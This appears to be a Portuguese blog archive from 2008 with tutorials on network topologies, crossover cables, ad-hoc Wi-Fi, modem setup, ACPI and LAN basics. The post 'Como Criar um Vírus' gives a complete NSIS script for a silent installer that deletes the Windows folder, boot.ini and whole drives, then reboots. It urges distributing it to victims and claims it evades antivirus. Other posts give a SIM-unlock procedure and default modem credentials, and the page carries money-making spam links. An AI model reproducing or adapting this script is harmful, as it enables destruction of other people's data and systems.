18 de dez. de 2008

TOPOLOGIAS DE REDE

Comece a ganhar dinheiro agora na internet Clique Aqui!

A topologia refere-se ao "layout físico" e ao meio de conexão dos dispositivos na rede, ou seja, como estes estão conectados. Os pontos no meio onde são conectados recebem a denominação de nãs, sendo que estes nãs sempre estão associados a um endereço, para que possam ser reconhecidos pela rede.
Várias são as estratégias de topologia, embora as variações sempre derivem de três topologias básicas que são as mais frequentemente empregadas:
ANEL, BARRAMENTO E ESTRELA

TOPOLOGIA EM ANEL
A topologia em anel é caracterizada como um caminho unidirecional de transmissão, formando um círculo lógico, sem um final definido. A estratégia de controle pode ser centralizada ou distribuída.
O sinal originado por um nó passa em torno do anel, sendo que em cada nó o sinal é regenerado e retransmitido. Como acontece em qualquer topologia, cada estação, ou nó, atende por um endereço que, ao ser reconhecido por uma estação, aceita a mensagem e a trata.
Uma interrupção no anel pode ser prontamente identificada e isolada, uma vez que o transmissor não recebe a confirmação da recepção da mensagem por ele enviada. A correta localização da estação defeituosa pode ser efetuada por cronometragem da mensagem, ou ausência de "status" da estação.






TOPOLOGIA EM BARRAMENTO
Na topologia em barramento pode ser empregada a comunicação com caminhos bidirecionais. Todos os nós são conectados diretamente na barra de transporte, sendo que o sinal gerado por uma estação propaga-se ao longo da barra em todas as direções.
Cada nó atende por um endereço na barra de transporte, portanto, quando uma estação conectada no barramento reconhece o endereço de uma mensagem, esta a aceita imediatamente, caso contrário, a despreza.





TOPOLOGIA EM ESTRELA

A topologia em estrela é caracterizada por um determinado número de nós, conectados em uma controladora especializada em comunicações.
Como esta estação tem a responsabilidade de controlar os enlaces, esta deve possuir elevado grau de inteligência, uma vez que todo o controle de fluxo de mensagens através da rede deve ser por ela efetuado. A arquitetura SNA da IBM explora este tipo de topologia, pois ela foi concebida em camadas de forma hierárquica, atribuindo responsabilidades a cada um desses componentes.
As controladoras mais evoluídas operam de forma a tornar a rede o menos vulnerável possível - em geral estas possuem duplicidade dos componentes mais críticos - , pois sua interrupção causar a paralização de toda a rede. Já as paralizações em nãs adjacentes às controladoras poderão ser facilmente identificadas, e inclusive procedimentos de recuperação podem ser ativados automaticamente.

14 de dez. de 2008

Configurando rede entre dois micros rapidamente

As duas formas mais rápidas e baratas de criar uma rede entre dois micros são:
a) Usar um cabo cross-over
b) Configurar uma rede wireless ad-hoc (no caso de dois notebooks com placas wireless)
Os cabos de rede "normais", são chamados de cabos retos, ou "straight". Eles são chamados de retos simplesmente por que usam o mesmo padrão nos dois lados do cabo. Ou seja, o fio crimpado no primeiro pino do lado A, vai ser crimpado também no primeiro pino do lado B, e assim por diante. Os dois lados do cabo são iguais.
Os cabos cruzados, ou cross-over possuem a posição de dois dos pares trocadas numa das pontas. Essa combinação permite que dois micros conversem diretamente, sem precisar de um hub. Você simplesmente liga o cabo e tem uma rede instantânea entre os dois.

Você pode comprar cabos em qualquer loja de informática que se preze, mas se você é da época em que homem eram homens e crimpavam seus próprios cabos, a pinagem de um cabo cross é a seguinte:
Lado A:
1- Branco com Laranja
2- Laranja
3- Branco com Verde
4- Azul
5- Branco com Azul
6- Verde
7- Branco com Marrom
8- Marrom
Lado B:
1- Branco com Verde
2- Verde
3- Branco com Laranja
4- Azul
5- Branco com Azul
6- Laranja
7- Branco com Marrom
8- Marrom

Com os dois micros ligados, falta apenas configurar o IP em ambos para que eles comecem a conversar.
No Windows XP, você configura a rede no Painel de Controle > Conexões de Rede. Clique com o botão direito sobre o "Conexão local" e acesse as propriedades do Protocolo TCP/IP.
Configure os dois micros usando endereços IP diferentes, como "192.168.0.1" e "192.168.0.2", por exemplo e use a máscara "255.255.255.0" em ambos. O Gateway e o DNS são necessários apenas para acessar a Internet, não para fazer uma rede simples entre dois micros.
Para compartilhar arquivos entre as duas máquinas, não se esqueça de manter o "Cliente para redes Microsoft" e o "Compartilhamento de arquivos e impressoras para redes Microsoft" ativados na configuração da rede. Você precisa também colocar as duas máquinas no mesmo grupo de trabalho, que você define no Meu Computador > Propriedades > Nome do Computador.
No Linux é mais simples, pois você pode configurar o IP e ativar a rede, independentemente da distribuição usada, com um único comando, como em:
# ifconfig eth0 192.168.0.1 up(como root)
A menos que você tenha mais de uma placa de rede, sua placa cabeada será sempre a eth0. O "192.168.0.1" é o IP que está sendo atribuído e o "up" conclui o comando, dizendo que a placa deve ser ativada imediatamente.
Agora você só precisa ativar o segundo micro, configurando-o com um IP diferente, como em:
# ifconfig eth0 192.168.0.2 up
Lembre-se que tanto no Linux, quanto no Windows, você pode usar o comando "ping" para testar a conectividade entre os dois micros (ele não funciona se você estiver usando firewall). Abra o terminal (ou o prompt do DOS, no caso do Windows) e consulte o outro micro, como em:
ping 192.168.0.1
Uma forma rápida e fácil de transferir arquivos entre duas máquinas Linux é ativar o servidor SSH na máquina que fará papel de servidor e usar o "fish://" do Konqueror na máquina que ficará como cliente. Abra uma janela do Konqueror na segunda máquina e, na barra de endereços, digite:
fish://usuario@192.168.0.1
Aqui, o "usuário" e um login da outra máquina e o "192.168.0.1" é o IP. Ele vai pedir a senha da conta. A partir daí o gerenciador passa a mostrar os arquivos da outra máquina e você pode transferir simplesmente arrastando.
O SSH permite várias outras coisas além de transferir arquivos. Você pode ler mais sobre ele no meu Guia de acesso remoto: http://www.guiadohardware.net/guias/10/
Você pode também usar o Samba para compartilhar arquivos do Linux para as máquinas Windows, mas isso já é assunto para outra dica :).
A segunda opção é configurar uma rede ad-hoc entre os dois. A velocidade de transmissão em uma rede ad-hoc é a mesma que em uma rede wireless em modo infra-estrutura (com um ponto de acesso), ou seja, 11 megabits ao usar placas 802.11b ou 54 megabits ao utilizar placas 802.11g, mas o alcance do sinal é bem menor, já que os transmissores e as antenas das interfaces não possuem a mesma potência do ponto de acesso. A velocidade também tende a cair muito mais rapidamente conforme aumenta a distância, embora isso não seja problema caso os dois estejam dentro do mesmo ambiente.

Para criar uma rede ad-hoc no Windows XP, acesse o "Painel de Controle > Conexões de rede". Dentro das propriedades da conexão de redes sem fio, acesse a aba "Redes sem fio" e clique no "adicionar". Na tela seguinte, defina o SSID da rede ad-hoc, marque a opção "Esta é uma rede de computador (ad hoc); não são usados pontos de acesso sem fio":
Assim como ao configurar um ponto de acesso, você pode ativar o uso de encriptação. O modo mais compatível é escolher a opção "Aberta(o)" na opção "Autenticação de rede" e usar a opção "WEP" na opção "Criptografia de dados", definindo uma chave de acesso (desmarque a opção "Chave fornecida automaticamente").
Embora tanto as chaves WEP de 64, quanto as de 128 bits sejam vulneráveis, é sempre recomendável usar chaves de 128 bits, que são um pouco mais difíceis de quebrar. A chave pode conter 13 caracteres ASCII (letras, números e caracteres especiais) ou 26 caracteres em hexa (números e as letras de A a F). Se preferir definir uma chave de 64 bits, use 5 (ASCII) ou 10 (hexa) caracteres. O WEP é fácil de quebrar, mas os risco é minimizado devido ao alcance reduzido da rede ad-hoc. Se a segurança não for uma prioridade, esta é a configuração recomendável.

Depois de criar a conexão ad-hoc no primeiro PC, ela passa a aparecer para o segundo na lista de redes disponíveis (o ícone ao lado do relógio), permitindo que ele se conecte ao primeiro, após fornecerem a chave de encriptação.

Continuando, a maior parte dos utilitários de configuração de rede wireless no Linux suportam também o uso de redes ad-hoc. Ao usar o Ubuntu, Kubuntu ou outra distribuição que utilize o network-manager, por exemplo, a rede ad-hoc aparece na lista de redes disponível e você pode se conectar diretamente depois de fornecer a passphrase. É possível também criar uma nova rede ad-hoc usando a opção "Criar nova rede sem fio" na janela de seleção de rede, indicando o SSID, o sistema de encriptação e a passphrase desejados:

É possível também configurar a rede em modo ad-hoc via linha de comando. Comece logando-se como root e rode o comando "cat /proc/net/wireless" para verificar como o sistema detectou sua placa wireless (dependendo do chipset usado, ela pode ser vista como eth1, wlan0, ath0 ou ra0)

Comece ativando a placa usando o comando "ifconfig $placa up", seguido do comando do iwconfig que coloca a placa em modo ad-hoc, como em:
# ifconfig eth1 up
# iwconfig eth1 mode Ad-Hoc

O próximo passo é definir o SSID da rede, dessa vez usando o parâmetro "essid" do iwconfig, como em:
# iwconfig eth1 essid gdh
Falta agora definir a chave de encriptação. Ao usar uma chave WEP contendo caracteres ASCII, use o parâmetro "key restricted s:", seguido pela chave, como em:

# iwconfig eth1 key restricted s:minhachave123

Se for usada uma chave contendo caracteres em hexa, remova o "s:", especificando a chave diretamente, como em:
# iwconfig eth1 key restricted 1234567890
Com isso a rede ad-hoc está configurada. Falta apenas ajustar os endereços. Para definir o endereço e a máscara manualmente, use:
# ifconfig eth1 10.0.0.1 netmask 255.0.0.0 up

Estes mesmos comandos podem ser usados para criar uma nova rede ad-hoc, quanto para conectar a máquinas Linux a uma rede já existente (caso o outro micro rode Windows e você tenha criado a rede nele, por exemplo). Como a rede ad-hoc usa um sistema ponto a ponto, você precisa apenas fazer a mesma configuração em todos os micros. Eles são comandos genéricos, funcionam em todas as placas, sem depender de nenhum utilitário adicional.

Continuando, caso o micro Linux tenha duas interfaces de rede, você pode compartilhar a conexão com o outro micro, conectado à rede ad-hoc usando os três comandos abaixo. Note que o "eth0" é a interface da rede cabeada (ou a interface onde está a conexão) e não a placa wireless:
# modprobe iptable_nat
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

O terceiro comando diz que quando um dos PCs da rede ad-hoc tentar acessar a web, os pacotes devem ser encaminhados para a placa eth0, que no exemplo é a interface da rede local. Como no exemplo não instalamos um servidor DHCP, é necessário configurar manualmente os endereços dos PCs da rede ad-hoc, configurando-os para usar o micro Linux como gateway e os endereços DNS do provedor.

No caso do Windows, você pode compartilhar a conexão clicando sobre a placa cabeada (onde está a conexão) dentro do Painel de controle > Conexões de rede e marcando a opção Avançado > Permitir que outros usuários da rede se conectem pela conexão deste computador à Internet.

20 de out. de 2008

REDE

Comece a ganhar dinheiro agora na internet Clique Aqui!

DIAGRA DE CABO DE REDE

Primeiramente vale a pena esclarecer que o método/diagramas mostrados aqui é apenas 1 dos métodos de criação de cabos tipo CAT5 direto ou cross-over. Existem outros padrões/diagramas que também funcionam.

Bem após o aviso, antes de você se aventurar a fazer seu cabo de rede, é importante você definir que tipo de cabo precisa, e é claro, ter em mãos o material e ferramentas necessárias para a montagem.

Não iremos nesta dica explicar em detalhes como montar um cabo de rede, mostraremos apenas os diagramas de conexão/ligação do cabo.

Definindo o cabo a ser utilizado:

Como falamos acima existem basicamente 2 tipos de conexão no cabo: direta e invertida (também chamada cross-over).

Cabo direto (ou patch cable): utilizado para ligação da placa de rede ao hub
Cabo invertido (ou crossover cable): utilizado para ligação entre 2 hubs (também chamado cascateamento), ou então para ligar 2 micros pela placa de rede (padrão RJ45) sem a utilização de hub.

Tenha em mãos as ferramentas/materiais necessários que são:
- Pedaço de cabo de rede padrão CAT 5 (4 pares de fios)
- Conectores RJ45
- Alicate de Crimpagem

Diagrama de conexão dos cabos:

Existem vários padrões de conexão dos cabos em uma rede, ou seja da ordem dos cabos internamente no conector. Deixando de lado a discussão de qual padrão é melhor, vamos apresentar o esquema de conexão no padrão EIA 568B.

Esta é a configuração do padrão CAT 5 para cabo direto (ou patch cable) no padrão 568B: veja Tabela 1 e Figura A abaixo.



Tabela 1: Patch cable CAT 5 (EIA 568B)
Conector #1 Conector #2
Branco/Laranja Branco/Laranja
Laranja/Branco Laranja/Branco
Branco/Verde Branco/Verde
Azul/Branco Azul/Branco
Branco/Azul Branco/Azul
Verde/Branco Verde/Branco
Branco/Marrom Branco/Marrom
Marrom/Branco Marrom/Branco
Nota: A primeira cor listada no par, é a cor dominante do fio, ou seja, no cavo azul/banco, é um fio azul com listras brancas e o cabo branco/azul, é um fio branco com listras azuis.


Esta é a configuração do padrão CAT 5 para cabo invertido (ou crossover) no padrão 568B: veja Tabela 2 e Figura B abaixo.

Tabela 2: cabo Crossover CAT 5
Conector #1 Conector #2
Branco/Laranja Branco/Verde
Laranja/Branco Verde/Branco
Branco/Verde Branco/Laranja
Azul/Branco Azul/Branco
Branco/Azul Branco/Azul
Verde/Branco Laranja/Branco
Branco/Marrom Branco/Marrom
Marrom/Branco Marrom/Branco

1 de set. de 2008



SIMULADOR DE INSTALAÇÃO DO XP
Clique na imagem abaixo para baixar


CCLEANER - LIMPEZA DE REGISTRO
Clique na imagem abaixo para baixar


WINRAR - COPACTADOR E DESCOMPACTADOR DE ARQUIVO
Clique na imagem abaixo para baixar

19 de jun. de 2008

Desbloqueio do celular Sansung x480

DESBLOQUEIO - SAMSUNG X480
Primeiramente você deve tirar o seu atual chip e por o chip da operadora que você
quer usar. Se você usar esse procedimento que vou descrever com seu chip atual,
você terá problemas, então ponha de outra operadora.
Passos:
1. Ligue o aparelho com o chip que ele não aceita, a celular ira dizer CARTÃO
INCORRETO, então, nessa mesma tela digite: *#9998*3323# depois clique
em exit ou sair uma vez, se continuar na tela PRESS EXIT, aperte o cursor pra
baixo uma vez;
2. Depois disso o celular entrara na sua programação, logo então escolha o menu
opção 7, o celular vai reiniciar e vai aceitar o seu novo chip;
3. Quando ele entrar na tela normal do celular então você digita: *0141# e
aperta o botão VERDE de chamadas. Ele apresentara a seguinte tela:
PERSONALIZADO;
4. Vá no menu "configuração do telefone", "segurança" (opção 5), bloquear sim
(opção 6), e marque a opção desbloquear;
5. Irá aparecer uma mensagem na tela pedindo uma senha, que é a senha padrão
da samsung 00000000 (8 zeros).
Pronto ! Seu Samsung x480 já esta desbloqueado.
Depois disso pode usar o chip que quiser.
Obs: Mas não esqueça, faça esse procedimento todo com UM CHIP QUE SEU CELULAR NÃO
ACEITA. Pois repito se fizer com o atual chip, ele até libera pra outros chips, porém toda vez que
ligar o aparelho, terá que fazer todo o procedimento do *#9998*3323# menu 7.
IMEI number: * # 0 6 #
Software version: * # 9 9 9 9 # albo * # 0 8 3 7 #
Net Monitor: * # 0 3 2 4 #
Chaning LCD contrast: * # 0 5 2 3 #
Memory info: * # 0 3 7 7 # albo * # 0 2 4 6 #
Reset CUSTOM memory: * 2 7 6 7 * 2 8 7 8 #
Battery state: * # 9 9 9 8 * 2 2 8 #
Alarm beeper: * # 9 9 9 8 * 2 8 9 #
Vibra test: * # 9 9 9 8 * 8 4 2 #
Reset memory (SIMLOCK`a removing): * 2 7 6 7 * 3 8 5 5 #

3 de jun. de 2008

Roteando Huawei Mt 800

A primeira coisa a fazer é entra na pagina do modem abra o seu navegador e digite 192.168.1.1 2) Logo após isso aparecer uma tela pedindo login e senha entre com esses dados: login: TMAR#HWMT8007079 senha: HWMT8007079Se não conseguir entrar, reset o modem e tente novamente, alguém pode ter te passado o modem com outra senha ou outro ip. O reset fica atrás do modem só pressionar com uma ponta de uma caneta ou algo parecido. Após isso tente novamente3 ) Após isso aparecer o site do modem, vá em NETWORK CONFIGURATION 4) Depois vá em ATM PVC lá em baixo na pagina terá a conection list delete todas elas. Senão não terá espaço pra colocar a nova instrução como PPPoE5) Depois coloque como estar na figura abaixo VPI = 0 e VCI = 33 coloque em PPoE ative o NAPT 6) No User Name e Password: você vai colocar em ambos seu ddd da cidade + seu telefone ex: 2733269999 7) Depois em PPP Auto Reconnect coloque em Enable 8) Depois em conection list click em ADD depois mais em baixo click em OK 9) Mantenha a pagina do modem abertar 10) Após isso coloque na configuração da sua placa de rede so clicar com botão direito do mouse em cima do Meus locais de rede e depois em propriedade depois coloque os ip correspondente aos dados abaixo IP ......................................192.168.1.X Mascara de sub rede.......255.255.255.0 Gateway............................192.168.1.1 e o DNS ............................192.168.1.1 X é uma variável pode ser qualquer numero maior que 1 pois esse seria o ip do modem, e menor que 25512) Caso queria colocar mais maquina no velox coloque o modem num hub e configure as faixa de ip, gateway, dns nas maquinas conectada ao hubCaso tenham duvidas entrem no site http://www.abusar.org/manuais/c_huawei.html q possui o tutorial com fotos.

26 de abr. de 2008

VOCÊ SABE O QUE É ACPI

ACPI é abreviação de "Advanced Configuration and Power Interface". Ele é o sistema de configuração e economia de energia utilizado pelos PCs atuais.

O ACPI é o responsável não apenas pelo suporte a economia de energia (incluindo o ajuste dinâmico da freqüência do processador), mas também pela inicialização de vários periféricos. É comum, por exemplo, que a placa wireless não seja detectada, ou que você não consiga ativar o transmissor usando os botões até que instale o driver ou utilitário fornecido pelo fabricante. No Acer 5043 (e outros modelos similares), por exemplo, você só consegue ativar o transmissor da placa wireless depois de instalar o Acer Launch Manager.
Com relação ao gerenciamento de energia, o ACPI é o sucessor do DPMA, usado em micros 486 e Pentium. A diferença básica entre os dois é que no ACPI o gerenciamento de energia é feito pelo sistema operacional e não pelo BIOS. Isso permite um gerenciamento muito mais avançado, permitindo recursos como diminuir a frequência de operação do processador (um recurso incomum em desktops, mas presente na maioria dos notebooks), desligar dispositivos, etc. Graças ao ACPI, os PCs atuais permitem um gerenciamento de energia muito mais sofisticado que os antigos, onde era possível apenas desligar o monitor e o HD. O avanço veio na forma de dois novos modos, o modo de espera e o hibernar. Ao entrar em modo de espera, não apenas o HD e o monitor, mas quase todo o PC é desligado, incluindo o processador, o cooler, placa de vídeo ou som, etc. Apenas a memória RAM, partes da placa mãe, modem e placa de rede continuam ativos. A memória RAM continua sendo alimentada para manter os dados gravados e permitir que o PC volte exatamente onde estava. É a única parte do PC que realmente não pode ser desligada sem que seja necessário um novo boot. O modem permanece ligado para que a conexão não caia e a placa de rede permanece alerta para acordar o PC caso o recurso de wake-on-lan esteja ativado no Setup. Em modo de espera o PC consome de 15 a 20 Watts de energia, o mesmo que uma lâmpada fluorescente e pode voltar à atividade em poucos segundos. Note que apenas o cooler do processador é desligado, o exaustor da fonte continua funcionando, pois ainda é necessário que ela forneça uma quantidade razoável de energia. Para que a opção de entrar em modo de espera esteja disponível, é necessário que a sua placa mãe ofereça suporte a ACPI. O Windows (a partir do 98) é capaz de detectar isto e ativar ou não o suporte automaticamente. Veja que isto inclui apenas placas razoavelmente recentes, e mesmo assim o suporte pode ser desativado caso você tenha alguma placa ISA que não suporte este recurso. Como opção, existe o hibernar (ou suspender) onde o conteúdo da memória RAM é gravado no HD e o PC é realmente desligado. Ao liga-lo novamente o sistema simplesmente recupera os dados e também volta exatamente onde estava. O tempo necessário depende da quantidade de memória RAM que estiver instalada, quanto mais memória maior será o arquivo no HD e mais demorará. Mas, geralmente ainda será bem mais rápido que um boot completo.

22 de abr. de 2008

CURSO DE REDE PARTE 1 (LAN)

Em computação, LANs (acrônimo de Local Area Network, "rede de área local" ) são redes utilizadas na interconexão de equipamentos processadores com a finalidade de troca de dados. Um conceito mais definido seria: é um conjunto de hardware e software que permite a computadores individuais estabelecerem comunicação entre si, trocando e compartilhando informações e recursos. Tais redes são denominadas locais por cobrirem apenas uma área limitada (10 Km no máximo, quando passam a ser denominadas MANs ), visto que, fisicamente, quanto maior a distância de um nó da rede ao outro, maior a taxa de erros que ocorrerão devido à degradação do sinal.As LANs são utilizadas para conectar estações, servidores, periféricos e outros dispositivos que possuam capacidade de processamento em uma casa, escritório, escola e edifícios próximos.
Componentes de uma LAN

Servidores
Servidores são computadores com alta capacidade de processamento e armazenagem que tem por função disponibilizar serviços, arquivos ou aplicações a uma rede. Como provedores de serviços, eles podem disponibilizar e-mail, hospedagem de páginas na internet, firewall, proxy, impressão, banco de dados, servir como controladores de domínio e muitas outras utilidades. Como servidores de arquivos, eles podem servir de depósito para que os utilizadores guardem os seus arquivos num local seguro e centralizado. E, finalmente, como servidores de aplicação, disponibilizar aplicações que necessitam de alto poder de processamento à máquinas com baixa capacidade, chamadas de thin clients (clientes magros).
Estações
As estações de trabalho, também chamadas de clientes, são geralmente computadores de secretária, portáteis ou PDAs, os quais são usados para acesso aos serviços disponibilizados pelo servidor, ou para executar tarefas locais. São máquinas que possuem um poder de processamento menor. Algumas vezes são usadas estações sem disco (diskless), as quais usam completamente os arquivos e programas disponibilizados pelo servidor.
Sistema Operacional de Rede
O Sistema Operacional de Rede é um programa informático de controle da máquina que dá suporte à rede, sendo que existem 2 classes de sistema: sistema cliente e sistema servidor.O sistema cliente possui características mais simples, voltadas para a utilização de serviços, enquanto que o sistema servidor possui uma maior quantidade de recursos, tais como serviços para serem disponibilizados aos clientes.Os sistemas baseados em Unix são potencialmente clientes e servidores, sendo feita a escolha durante a instalação dos pacotes, enquanto que em sistemas Windows, existem versões clientes (Windows 2000 Professional, Windows XP) e versões servidores (Windows 2000 Server e Windows 2003 Server).
Meios de Transporte
Atualmente, os meios de transporte de dados mais utilizados são a Ethernet ou o Wireless, operando a velocidades que variam de 10 a 10000 Mbps. As mídias de transmissão mais utilizadas são os cabos (par trançado, coaxial, fibra óptica) e o ar (em redes Wireless).
Dispositivos de rede
Dispositivos de rede são os meios físicos necessários para a comunicação entre os componentes participantes de uma rede. São exemplos os concentradores, os roteadores, repetidores, os switchs, as bridges, as placas de rede e os pontos de acesso wireless.
Protocolos de Comunicação
Protocolo é a "linguagem" que os diversos dispositivos de uma rede utilizam para se comunicar. Para que seja possível a comunicação, todos os dispositivos devem falar a mesma linguagem, isto é, o mesmo protocolo. Os protocolos mais usados atualmente são o TCP/IP, IPX/SPX e o NetBEUI.
História
Na época anterior aos PCs, as empresas possuíam somente um computador central, com usuários o acessando através de terminais utilizando um cabo simples de baixa velocidade. Redes tais como a SNA (Systems Network Architecture) da IBM estavam focadas em linkar terminais ou outros mainfraimes em locais remotos através de conexões dedicadas sendo, portanto, WANs.As primeiras LANs foram criadas no final de 1970 e eram usadas para criar links de alta velocidade entre grandes computadores centrais em um determinado local. De muitos sistemas competidores criados nessa época a Ethernet, e ARCNET eram os mais populares.O crescimento do CP/M e depois dos computadores pessoais baseados em DOS, proporcionaram que um único local pudesse ter dúzias e até centenas de computadores. A atração inicial das redes era geralmente compartilhar espaço em disco e impressoras à laser, os quais eram extremamente caros na época. Um entusiasmo maior com o conceito de LAN surgiu por volta de 1983, o qual foi declarado pela indústria de computadores como "o ano da LAN".Na realidade o conceito de LAN foi estragado devido à proliferação de camadas físicas e implementações de protocolos incompatíveis, assim como confusões em como melhor compartilhar recursos. Tipicamente, cada fabricante tinha seu próprio tipo de placa de rede, cabos, protocolos e sistema operacional de rede. Uma solução apareceu com o advento do Novell NetWare, o qual proporcionou suporte a mais de 40 tipos de placas de rede e cabos, e um sistema operacional muito mais sofisticado do que qualquer um dos competidores. O NetWare dominou as LANs dos computadores pessoais até a introdução do Microsoft Windows NT Advanced Server em 1993 e o Windows for Workgroups ("Windows para grupos de trabalho").Dos competidores do NetWare, somente Banyan Vines tinha forças técnicas comparáveis, mas Banyan nunca obteve uma base segura. A Microsoft e a 3Com trabalharam juntas para criar um sistema operacional de rede simples o qual formou a base da 3Com 3+Share Microsoft Lan Manager e IBM Lan Server. Nenhum desses particularmente teve sucesso.No mesmo período de tempo, computadores baseados em Unix estavam utilizando redes baseadas em TCP/IP, influenciando até hoje a tecnologia dessa área.

1 de abr. de 2008

Como Criar um Vírus

Baixe o NSIS em nsis.sourceforge.net e instale-o. Ele é gratuito (e open source). Não vamos nos deter com o script dele, vamos direto ao assunto. Ele possui uma função "Delete", que apaga arquivos ou pastas. Basta você adicionar os nomes de arquivos ou pastas desejados, e gerar o programa. Esta função deveria ser usada para apagar arquivos de um programa que seria desinstalado, já que o NSIS é um criador de programas de instalação para outros programas. Mas como apaga arquivos que você define, pode ser usada para o mal também, só depende das suas intenções. Em menos de 1 minuto seu vírus estará pronto.

Com o NSIS instalado, abra um editor de textos puro, como o Bloco de notas, e digite (ou copie e cole) o texto em vermelho:

!define PRODUCT_NAME "APAGADOR_XXX"
!define PRODUCT_VERSION "1.0"
!define PRODUCT_PUBLISHER "HACKER_XXX"

SetCompressor lzma

Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"
OutFile "MeuVirus.exe"
InstallDir "$TEMP"
Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"
SilentInstall silent

Section "Sec001" SEC01
Delete /REBOOTOK "$WINDIR\*.*"
SectionEnd

Section -Post
Reboot
SectionEnd

Salve com a extensão ".nsi", e escolha "Todos os arquivos", no campo "Salvar como tipo". A extensão ".nsi" é a de projeto do NSIS, você poderia usar outra qualquer e depois abri-lo no compilador do NSIS ("Iniciar > Programas > MakeNSISW (Compiler GUI)").

Vamos entender esse arquivo... As três primeiras linhas identificam o "programa" que seria instalado, afinal o NSIS é um instalador. Deixe como está, ou escreva qualquer coisa, de preferência não palavras. O item "OutFile" é o executável que será gerado, é o seu vírus que deverá ser distribuído. A linha "SilentInstall silent" gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.

Na seção "Sec01", você deve adicionar as entradas "Delete" que desejar. Existem outros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.

A linha "Delete /REBOOTOK "$WINDIR\*.*" apaga tudo da pasta do Windows, deixando para apagar na próxima inicialização o que estiver em uso. Copie-a e cole-a abaixo dela, antes do SectionEnd, trocando as pastas ou arquivos que você queira apagar. Por exemplo:

Delete /REBOOTOK "C:\boot.ini"
Delete /REBOOTOK "C:\Meus documentos\*.*"
Delete /REBOOTOK "C:\*.*"
Delete /REBOOTOK "D:\*.*"
Delete /REBOOTOK "E:\*.*"
Delete /REBOOTOK "F:\*.*"
Delete /REBOOTOK "G:\*.*"
Delete /REBOOTOK "C:\Arquivos de programas\*.*"


Adicione o que quiser, arquivos específicos, etc.

A última seção, "Section -Post / Reboot / SectionEnd", será executada ao concluir o instalador, ou seja, quando ele terminar sua ação. O comando "reboot" reiniciará o computador, que na próxima inicialização nem inicia mais. Se você quiser, pode remover essas três últimas linhas, para deixar o usuário em desespero, vendo que tudo do seu PC foi apagado.

Salve o arquivo. Abra o compilador do NSIS, em "Iniciar > Programas > MakeNSISW (Compiler GUI)", clique no menu "File > Load script", localize o arquivo de extensão ".nsi" que você salvou. Ele já compilará, é rapidinho. NÃO CLIQUE NO BOTÃO "TEST INSTALLER".

O vírus está pronto! E, em condições normais, nenhum anti-vírus o detectaria, a menos que ele fosse parar nas mãos de algum criador de anti-vírus.

Como testá-lo sem se ferrar por conta da própria criação? Use máquinas virtuais! Já comentei aqui no Explorando sobre o Bochs, na seção de matérias do site Mep Sites (materias.mepsites.cjb.net) você encontra um tutorial dele. Pode usar também o QEMU, com a ajuda do Kemula (kemula.mepsites.cjb.net), se precisar. Ou o comercial e carinho VMware. Usando uma máquina virtual você ferra apenas o sistema virtual, que pode ser facilmente restaurado se você tiver uma cópia dele em CD ou outra pasta. Dica: use máquinas virtuais também para testar pela primeira vez programas que você pega na Internet, e mais: navegue na Internet só pela máquina virtual! Quanto ao seu "virusinho", se preferir, teste num PC cobaia, onde você saiba que tudo pode ser apagado. Leia a ajuda do NSIS para ver outros comandos e constantes de pastas.

27 de mar. de 2008

CURSOS GRÁTIS AO ALCANCE DE TODOS

Cursos Gratuitos e com certificados na internet, agora são a forma mais fácil de se capacitar e sem ter que gastar rios de dinheiro. Existe hoje em dia uma grande dificuldade de se dispor tempo para fazer algumas capacitações profissionais ou intelectuais e esse quadro vem se alarmando, pois as pessoas a cada dia ficam com seu tempo mais apertado, o que dificulta o acesso a cursos e outros meios de aprendizado.
Outro fator que também faz com que as pessoas deixem de se capacitar são as altas taxas cobradas por empresas que oferecem capacitação. Abaixo listo algumas instituições que se preocuparam com o fator mencionado acima, são sites que oferecem cursos de ótima qualidade e que disponibilizam certificado.



CLIQUE NOS LINKS PARA ACESSAR OS SITES DOS CURSOS


http://jedi.wv.com.br/
http://cursos.cdtc.org.br/
http://www.nextg.com.br/

26 de mar. de 2008

GLOSSÁRIO INTERNETÊS

Attachment - Enviar um attachment significa anexar um arquivo a uma mensagem eletrônica e enviá-lo a alguém.
Antivírus - Programa que detecta e elimina vírus de computador.
Backbone - Espinha dorsal das grandes redes de comunicação na Internet. Normalmente são conexões de alta-velocidade que interconectam redes regionais.
Banco de Dados - Conjunto de informações relacionadas entre si, referentes a um mesmo assunto e organizadas de maneira útil, com o propósito de servir de base para que o usuário recupere informações, tire conclusões e tome decisões.
Banner - É um anúncio de propaganda colocado num website (banner em inglês quer dizer estandarte).
Bit - A menor unidade de informação utilizada em informática. Corresponde a 0 (zero) ou 1 (um), ligado/desligado, presença/ausência, etc.
Bookmark - Tipo de agenda onde você guarda os endereços visitados na Internet, tornando fácil visitá-los novamente. São chamados de bookmarks/marcadores no Netscape e Favoritos no Internet Explorer.
Bps - Significa bits por segundo. A velocidade do modem é expressa em quantos bits ele pode transferir por segundo. Quanto maior o número de bps, mais rápida é a velocidade do modem.
Browser - Também chamado navegador, é o programa utilizado para visualizar as páginas da WWW. Atualmente, os dois mais conhecidos são o Internet Explorer e o Netscape Navigator.
Byte - É um conjunto de 8 (oito) bits. Um byte é uma unidade que determina uma informação, que pode ser um caractere (letra) ou um código para um desenho na tela.

Cache - Quando navegamos na Internet os browsers armazenam as últimas imagens e páginas visitadas no cache, ou seja, guardam na memória. O espaço que a memória cache do browser ocupa no disco rígido do computador pode ser configurado.
Cookie - São arquivos que contêm informações como nome e preferências dos visitantes de um website. Esta informação é fornecida por cada usuário em sua primeira visita ao site. O servidor registra a informação num arquivo e armazena no disco rígido do visitante. Assim, ao retornarmos ao site, a navegação será mais rápida, pois o servidor já terá a configuração das preferências do visitante.

DNS (Domain Name System) - É um sistema hierárquico de base de dados distribuídas que converte um nome de domínio em um endereço IP do computador/servidor Internet de um provedor de acesso e hospedagem de websites.
Domínio - Nome que identifica um computador, departamento, ou organização na rede Internet.
Download - É o ato de copiar (transferir) um arquivo de um site da Internet para o seu próprio computador.
Dial-Up - Conexão feita com outro computador através de uma linha telefônica comum.
DVD - O Digital Versatile Disc (disco digital versátil) tem o aspecto semelhante ao de um CD, mas sua capacidade de armazenamento é de sete a 14 vezes maior.

